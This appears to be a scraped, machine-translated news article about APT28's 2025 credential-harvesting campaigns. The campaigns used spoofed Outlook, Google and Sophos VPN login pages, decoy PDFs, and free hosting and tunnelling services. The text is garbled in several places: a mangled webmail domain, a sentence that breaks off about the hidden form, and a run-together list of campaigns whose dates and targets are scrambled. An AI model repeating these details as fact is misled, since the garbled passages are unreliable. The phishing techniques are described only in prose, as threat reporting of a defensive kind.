Russian state-sponsored threat actors have been implicated in a series of new credential harvesting attacks targeting individuals associated with Turkey’s Energy and Nuclear Research Institute, as well as staff affiliated with European think tanks and organizations in North Macedonia and Uzbekistan.
This activity is believed to be by APT28 (also known as BlueDelta) and is believed to be the result of an “ongoing” credential harvesting campaign targeting users of UKR.[.]last month’s net. APT28 coordinates with the main directorates of the General Staff of the Armed Forces of the Russian Federation (GRU).
Recorded Future’s Insict Group said, “The use of Turkish language and regionally targeted lure material suggests that Blue Delta has tailored its content to increase credibility among specific professional and geographic audiences.” “These selections reflect continued interest in organizations related to energy research, defense cooperation, and government communications networks related to Russian intelligence priorities.”
The cybersecurity firm said the attacks targeted a small but distinct set of victims in February and September 2025, with campaigns utilizing fake login pages styled to resemble popular services such as Microsoft Outlook Web Access (OWA), Google, and the Sophos VPN portal.
This effort is notable for the fact that after credentials are entered on the fake landing page, unsuspecting users are redirected to the legitimate site, avoiding any red flags. Campaigns have also been found to rely heavily on services such as webhooks[.]site, InfinityFree, Byet Internet Services, and ngrok to host phishing pages, extract stolen data, and enable redirects.
In further attempts to appear legitimate, threat actors are said to have used legitimate PDF decoy documents, including a June 2025 Gulf Studies Center publication related to the Iran-Israel war and a July 2025 policy briefing for a new deal on the Mediterranean published by climate change think tank ECCO.
The attack chain begins with a phishing email containing a shortened link, which, when clicked, redirects the victim to another link hosted on a webhook.[.]site. The decoy document is briefly displayed for about 2 seconds before being redirected to the second webhook.[.]Sites that host spoofed Microsoft OWA login pages.
Within this page is a hidden HTML form element that stores the webhook.[.]Specify your site’s URL and use JavaScript to
It sends a “page opened” beacon, sends the submitted credentials to a webhook endpoint, and ultimately redirects to the PDF hosted on the actual website.
APT28 has also been observed running three other campaigns.
Deployed a credential collection page that mimics a Sophos VPN password reset page hosted on infrastructure provided by InfinityFree, collects credentials entered in a form, and redirects victims to a legitimate Sophos VPN portal belonging to an anonymous EU think tank June 2025 campaign A credential collection page hosted on the InfinityFree domain was used to falsely warn users about expired passwords and trick them into logging in September 2025 Campaign Enters credentials and redirects to a legitimate login page associated with a military organization in the Republic of North Macedonia and an IT integrator based in Uzbekistan April 2025 Campaign uses a fake Google password reset page hosted on Byet Internet Services to collect victim credentials and exfiltrate them to an ngrok URL
“Blue Delta’s consistent abuse of legitimate Internet services infrastructure demonstrates the group’s continued reliance on disposable services to host and relay authentication data,” the Mastercard-owned company said. “These campaigns highlight the GRU’s continued commitment to credential collection as a low-cost, high-yield intelligence gathering method in support of Russian intelligence objectives.”
Source link
